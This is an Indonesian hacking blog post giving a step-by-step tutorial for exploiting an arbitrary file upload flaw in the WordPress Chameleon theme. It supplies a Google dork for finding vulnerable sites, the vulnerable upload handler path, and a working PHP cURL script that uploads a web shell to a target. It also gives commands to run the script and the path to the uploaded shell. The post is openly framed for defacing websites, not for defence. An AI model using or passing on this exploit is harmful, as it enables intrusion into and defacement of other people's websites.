Home CMS Wordpress Deface Dunia Komputer Hacking Keamanan Website Security Tester Tutorial Tutorial WordPress Chameleon theme Arbitary File Upload

Friday 24 July 2015

Tutorial WordPress Chameleon theme Arbitary File Upload

Hallo fans, Nuenomaru disini , maaf baru bisa posting lagi wkwkw
baru ketemu lagi >.< maaf efek lebaran + liburan... *lupa ngeBlog xixihi

kali ini Nue akan share Exploit WP Chameleon theme Arbitary File Upload, etthoo,, ini exploit lama loh ..
hahaha iseng2 aja share kali aja masih crotz 

bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v )



langsung aja intip tutornya

 Langkah-Langkah:
1).Search Di Google Gunakan Dork
inurl:/wp-content/themes/cameleon/

 2).Jika Ketemu Masukan Exploit
/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
3).Jika Web Vuln Akan Keluar Tulisan {"error":"No files were uploaded."}

4).Buat File Baru Berekstensi .php Contoh cameleon.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn cameleon.php tadi :D

 <?php
$uploadfile="namashellsobat.php";
$ch = curl_init("http://targetsobat.co.li/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
5).Aktifkan XAMPP Klik Start Pada Apache
6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"

7).Ketik:
cd C:/xampp/php
php cameleon.php

 jika berhasil akan muncul tulisan success;true dan letak shell sobat..


Shell Akses: /wp-content/uploads/tahun/bulan/namashell.php 
done 

 Hahahaha Sekian tutorial kali ini.
numpang ngiklan..
Download MiniGames Android TKJ JumpMan.
<re/code> By: TKJ Cyber Art
Link:
Google Drive
sharebeast

 bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Happy wordpress Hacked !!
Sekian dan semoga bermanfaat .. terimakasih



source and thanks to: irfansyahputra Blog


./Nuenomaru

















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

Tutorial WordPress Chameleon theme Arbitary File Upload Tutorial WordPress Chameleon theme Arbitary File Upload MasterBlog TCA 5.0 stars based on 35 reviews Hallo fans, Nuenomaru disini , maaf baru bisa posting lagi wkwkw baru ketemu lagi >.< maaf efek lebaran + liburan... *lupa ngeB...
Share this with short URL Get Short URLloading short url

Related Posts

Next Post
Previous Post


EmoticonEmoticon

Subscribe to: Post Comments (Atom)